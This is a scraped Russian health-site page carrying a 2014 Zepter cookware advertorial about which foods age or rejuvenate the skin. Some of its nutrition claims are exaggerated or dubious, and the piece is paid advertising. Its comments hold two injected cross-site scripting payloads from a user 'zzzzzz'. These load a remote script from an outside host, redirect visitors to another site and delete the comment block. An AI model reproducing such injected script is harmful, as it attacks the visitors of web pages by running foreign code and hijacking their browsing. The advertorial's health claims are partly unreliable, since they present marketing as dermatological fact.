Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сохранять молодость – зна...  >>  Сохранять молодость – значит делать выбор в пользу здорового питания
 
Обратная связь
 

Сохранять молодость – значит делать выбор в пользу здорового питания

Размер шрифта
05 мая 2014 00:00
  • google_analytics: false
  • Нравится

Для того чтобы сохранить красоту и молодость, люди тратят огромные деньги на косметические средства и антивозрастные процедуры, при том что ухаживать за собой можно и в домашних условиях.

Сохранять молодость – значит делать выбор в пользу здорового питания

Сегодняшний ритм жизни заставляет нас менять многие привычки, в том числе привычки питания.

Пища, которую мы обычно употребляем:

1. Соленая пища

Соль определенно добавляет вкус нашей традиционной еде, однако важно помнить, что соль также высушивает кожу. Некоторые виды соли содержат йод, который, по мнению дерматологов, вызывает появление акне. Покраснения, отеки и повышенная чувствительность кожи – результат чрезмерного употребления соли.

2. Пища, богатая углеводами

В организме человека сахар и другие углеводы очень быстро преобразуются в глюкозу. Если мы едим слишком много продуктов, богатых углеводами, уровень глюкозы в крови повышается, и, следовательно, увеличивается выработка инсулина. Высокий уровень инсулина провоцирует быстрое отмирание клеток кожи и ускоряет процесс старения.

3. Сахар

Когда сахара попадают в организм, они присоединяются к аминогруппам тканевых белков, таким как коллаген, и медленно превращают их в конечные продукты гликирования (КПГ) – основную причину повреждений организма. В результате здоровые волокна коллагена теряют эластичность, становятся жесткими, более хрупкими и легко разрушаются. Таким образом, кожа «провисает» и появляются морщины.

4. Масло и жир

При нагревании масло преобразуется в транс-жиры, которые крайне опасны для кожи: они образуют свободные радикалы, которые повреждают клетки ДНК, могут вызывать рак кожи, способствуют появлению морщин и потере эластичности кожи. Иными словами, они ускоряют процесс старения.

Свежие фрукты и овощи должны стать обязательной частью нашего ежедневного рациона. Равно как и богатые белком мясо или рыба. Давайте вместе раскроем невероятные антивозрастные свойства следующих продуктов:

Сохранять молодость – значит делать выбор в пользу здорового питания

Апельсины

Эти фрукты содержат много воды, увлажняют клетки кожи. Апельсины – отличный источник витаминов С и А, а также кальция. Витамин С – антиоксидант, помогающий бороться с повреждениями кожи, вызванными солнечными лучами и плохой экологией, он сокращает морщины и улучшает общее состояние кожи. Витамин С играет важную роль в формировании коллагена, который необходим для обновления клеток кожи.

Авокадо

В авокадо содержатся полезные ненасыщенные монокислоты, которые помогают сохранить кожу увлажненной. Также они помогают абсорбировать некоторые нужные витамины и питательные вещества.

Последние исследования показали, что жиры, содержащиеся в авокадо, помогают поддерживать жизненные силы клеток, подвергшихся воздействию свободных радикалов, которые являются разрушительными, вызывают старение и провоцируют заболевания. 

Виноград

Виноград обладает противовоспалительными свойствами и является антиоксидантом, предохраняет кожу от окислительных повреждений и воспалений. Фитонутриенты, содержащиеся в винограде, особенно важны в процессах, предотвращающих старение. Ресвератрол, содержащийся в виноградных косточках, мякоти и кожице, положительно воздействует на все три фактора, отвечающие за продолжительность жизни. Альфа-гидроксикислота, также содержащаяся в винограде, является ключевой для поддержания здоровья кожи.

Постная говядина

Постная говядина – это отличный источник белка, участвующего в формировании коллагена.

Брюссельская капуста, брокколи, цветная капуста

Эти овощи содержат фитохимические соединения, витамины, минералы и клетчатку, необходимую для здоровья. Для кожи это важные источники витаминов А и С, а также фолиевой кислоты. Витамин С активирует коллаген, в то время как витамин А и фолиевая кислота снижают вредное воздействие солнечных лучей. Другая причина, по которой стоит употреблять в пищу много крестоцветных овощей, в том, что они содержат антиоксиданты и обладают противовоспалительными и защитными свойствами.

Лососевые

Эта рыба – один из лучших способов привнести в наш рацион омега-3 кислоты, которые помогают увлажнять кожу, защищают от вредного УФ-излучения и, следовательно, предотвращают преждевременное старение и появление ранних морщин. Также лососевые содержат уникальный ингредиент, помогающий бороться с морщинами – астаксантин, каротиноид, которым обусловлен бледно-розовый цвет рыбы. Он является сильным антиоксидантом, способным бороться со свободными радикалами, которые вырабатываются кожей под воздействием солнечных лучей.

Для того чтобы наслаждаться здоровой пищей, ее следует правильно приготовить. Готовя пищу традиционным способом, мы портим ее варкой в кипящей воде, обжариванием на насыщенных перегретых жирах. В результате еда, которая должна давать нам необходимые питательные вещества, лишается этих самых веществ и здоровых свойств.

Посуда коллекции Masterpiece от Zepter это уникальное решение для приготовления здоровой пищи. В ней мы готовим без добавления воды, жарим без добавления жиров. Таким образом, пища готовится правильным способом, сохраняя свои питательные вещества и органолептические свойства.

И, самое главное, помните, что сияющая, здоровая кожа – это залог вашей молодости, результат здорового питания, употребления достаточного количества воды, использования правильно подобранных средств по уходу за кожей, занятий спортом и полноценного сна.

Узнайте больше о правильных способах приготовления пищи для более долгой и здоровой жизни на официальном сайте компании ZEPTER International.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как часто есть   Как есть настоящую еду   Съесть или выкинуть?   Суперпродукты до и после застолья  
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Еда против старости
Лучшая еда для женщин. Часть 2
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.